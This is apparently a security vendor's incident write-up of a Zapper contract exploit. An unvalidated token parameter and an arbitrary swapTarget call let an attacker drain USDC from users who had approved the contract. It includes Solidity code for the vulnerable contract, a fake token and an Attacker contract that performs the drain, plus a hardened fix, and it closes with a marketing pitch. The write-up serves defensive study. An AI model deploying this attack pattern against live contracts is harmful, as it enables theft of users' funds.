The attacker first queried the balance of one of the users, and then called the zapIn function of the Zapper contract.
This function transfers the token named by the requiredToken parameter into the contract.
That parameter is supplied by the caller and is not validated, so the attacker could deploy a fake token, pass its address as requiredToken, and have the Zapper "transfer" it into itself.
zapIn then calls the internal function zap, which checks whether the contract's balance of the supplied token is greater than or equal to the amount passed in.
Because the attacker controls the fake token, and therefore the balance it reports, this check passes and execution continues to the next line.
The attacker wrote the fake token so that its transfer sends FRAX tokens to the Zapper contract; the Zapper then deposits that FRAX into the vault, so the call completes normally.
The attacker was then able to take USDC from other users who had approved the Zapper: the contract specified by the swapTarget argument is called externally, and the calldata passed to that call is also externally constructible. A call such as USDC.transferFrom(victim, attacker, amount), issued by the Zapper, succeeds for any user who had granted the Zapper an allowance.
The attacker repeated these steps three times, ultimately draining the USDC balances of three victims.
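The whole sequence above, as an added Solidity sketch that is not the exploited Zapper's source (this write-up does not reproduce it): a Zapper with the vulnerable zapIn/zap shape, the attacker's fake token and crafted swapTarget/swapData, and a hardened variant of the same function. IVault, the contract names, the allowlist scheme and the FRAX-deposit step are assumptions made for the example.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;
// Illustrative reconstruction only; IVault, names and the allowlist scheme are assumptions.

interface IERC20 {
    function balanceOf(address account) external view returns (uint256);
    function allowance(address owner, address spender) external view returns (uint256);
    function transfer(address to, uint256 amount) external returns (bool);
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
    function approve(address spender, uint256 amount) external returns (bool);
}

interface IVault {
    function deposit(uint256 amount, address receiver) external;
}

/// Vulnerable shape: the caller picks the token, the swap target and the calldata.
contract VulnerableZapper {
    IERC20 public immutable frax;
    IVault public immutable vault;
    constructor(IERC20 frax_, IVault vault_) { frax = frax_; vault = vault_; }

    function zapIn(address requiredToken, uint256 amount, address swapTarget, bytes calldata swapData) external {
        // A fake token can return true here without moving anything.
        IERC20(requiredToken).transferFrom(msg.sender, address(this), amount);
        _zap(requiredToken, amount, swapTarget, swapData);
    }

    function _zap(address requiredToken, uint256 amount, address swapTarget, bytes calldata swapData) internal {
        // Balance check against a token the caller controls proves nothing.
        require(IERC20(requiredToken).balanceOf(address(this)) >= amount, "insufficient balance");
        // Arbitrary call issued by a contract that holds user approvals: with swapTarget = USDC and
        // swapData = transferFrom(victim, attacker, x), USDC leaves any user who approved this Zapper.
        (bool ok, ) = swapTarget.call(swapData);
        require(ok, "swap failed");
        uint256 got = frax.balanceOf(address(this));
        frax.approve(address(vault), got);
        vault.deposit(got, msg.sender);
    }
}

/// Attacker's fake token: satisfies every check and forwards pre-funded FRAX to the Zapper
/// so the final vault deposit goes through, as described in the write-up.
contract FakeToken {
    IERC20 public immutable frax;
    constructor(IERC20 frax_) { frax = frax_; }
    function balanceOf(address) external pure returns (uint256) { return type(uint256).max; }
    function transferFrom(address, address to, uint256) external returns (bool) {
        uint256 bal = frax.balanceOf(address(this));
        if (bal > 0) frax.transfer(to, bal);
        return true;
    }
}

contract Attacker {
    function drain(VulnerableZapper zapper, IERC20 usdc, IERC20 frax, address victim) external {
        FakeToken fake = new FakeToken(frax);
        // Step 1 of the write-up: read the victim's balance, capped by what they approved to the Zapper.
        uint256 amount = usdc.balanceOf(victim);
        uint256 allowed = usdc.allowance(victim, address(zapper));
        if (allowed < amount) amount = allowed;
        bytes memory data = abi.encodeCall(IERC20.transferFrom, (victim, msg.sender, amount));
        zapper.zapIn(address(fake), 1, address(usdc), data);
    }
}

/// Hardened shape: allowlisted tokens and routers, a router can never be a token, the received
/// balance delta is measured, and only the tokens just pulled are approved, for this call only.
contract HardenedZapper {
    IERC20 public immutable frax;
    IVault public immutable vault;
    mapping(address => bool) public allowedToken;
    mapping(address => bool) public allowedRouter;

    constructor(IERC20 frax_, IVault vault_, address[] memory tokens, address[] memory routers) {
        frax = frax_; vault = vault_;
        for (uint256 i = 0; i < tokens.length; i++) allowedToken[tokens[i]] = true;
        for (uint256 i = 0; i < routers.length; i++) allowedRouter[routers[i]] = true;
    }

    function zapIn(address requiredToken, uint256 amount, address swapTarget, bytes calldata swapData) external {
        require(allowedToken[requiredToken], "token not allowed");
        require(allowedRouter[swapTarget] && !allowedToken[swapTarget], "bad swap target");
        uint256 before = IERC20(requiredToken).balanceOf(address(this));
        IERC20(requiredToken).transferFrom(msg.sender, address(this), amount);
        require(IERC20(requiredToken).balanceOf(address(this)) - before == amount, "short transfer");
        uint256 fraxBefore = frax.balanceOf(address(this));
        IERC20(requiredToken).approve(swapTarget, amount);
        (bool ok, ) = swapTarget.call(swapData);
        require(ok, "swap failed");
        IERC20(requiredToken).approve(swapTarget, 0);
        uint256 got = frax.balanceOf(address(this)) - fraxBefore;
        frax.approve(address(vault), got);
        vault.deposit(got, msg.sender);
    }
}
```

The two properties that matter are independent of the specific protocol: a contract that holds user approvals must never execute a call whose target and calldata the caller chooses, and a balance check against a caller-chosen token address is not a check at all. The hardened version pins both the token and the router to an allowlist, refuses any router address that is itself an approved token, measures what actually arrived rather than trusting the token's own report, and scopes the router's allowance to the amount pulled from msg.sender in that same call.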
Our security team at Neptune Mutual can validate your platform for DNS and web-based security, smart contract reviews, as well as frontend and backend security. We can offer you a solution to scan your platform and safeguard your protocol against known and unknown vulnerabilities that could have catastrophic long-term effects. Contact us on social media if you are serious about security and have the budget, desire, and sense of responsibility to do so.
The Neptune Mutual project safeguards the Ethereum community from cyber threats. The protocol uses parametric cover as opposed to discretionary insurance. It has an easy and reliable on-chain claim process. This means that when incidents are confirmed by our community, resolution is fast.
Join us in our mission to cover, protect, and secure on-chain digital assets.